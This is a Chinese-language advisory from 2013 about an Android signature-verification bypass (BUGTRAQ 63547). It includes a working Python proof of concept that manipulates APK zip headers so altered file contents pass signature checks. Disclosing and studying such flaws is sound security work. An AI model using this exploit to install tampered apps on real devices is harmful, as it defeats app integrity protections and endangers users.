Google Android签名验证安全措施绕过漏洞

发布日期:2013-11-04
更新日期:2013-11-07

受影响系统:
Google Android
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 63547

Android是基于Linux开放性内核的操作系统,是Google公司在2007年11月5日公布的手机操作系统。

Android 4.4及其他版本存在安全限制绕过漏洞,攻击者可利用此漏洞绕过某些安全限制以执行未授权操作。

<*来源:Jay Freeman
  *>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

#!/usr/bin/python

import zipfile
import struct
import sys

# usage: ./pocB.py new.apk old.apk file data
zout = zipfile.ZipFile(sys.argv[1], "w")
zin = zipfile.ZipFile(sys.argv[2], "r")
replace = sys.argv[3]
new = open(sys.argv[4], 'r').read()

fp = zout.fp

for name in zin.namelist():
    old = zin.read(name)
    if name != replace:
        zout.writestr(name, old, zipfile.ZIP_DEFLATED)
    else:
        assert len(new) <= len(old)

# write header, old data, and record offset
        zout.writestr(name, old, zipfile.ZIP_STORED)
        offset = fp.tell()

# return to name length, set to skip old data
        fp.seek(-len(old) -len(name) -4, 1)
        fp.write(struct.pack('<h', len(name) + len(old)))

# after old data, write new data \0 padded
        fp.seek(offset)
        fp.write(new)
        fp.write('\0' * (len(old) - len(new)))

zout.close()
zin.close()

建议:
--------------------------------------------------------------------------------
厂商补丁:

Google
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

推荐阅读

Android 4.4 开放短信 API 接口,第三方应用迎来春天

“Android 4.4”开箱图赏

Android 4.4 出现漏洞 黑客能远程遥控手机

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:http://www.heiqu.com/0037e6738ccc11ca848bf7a0124dfedf.html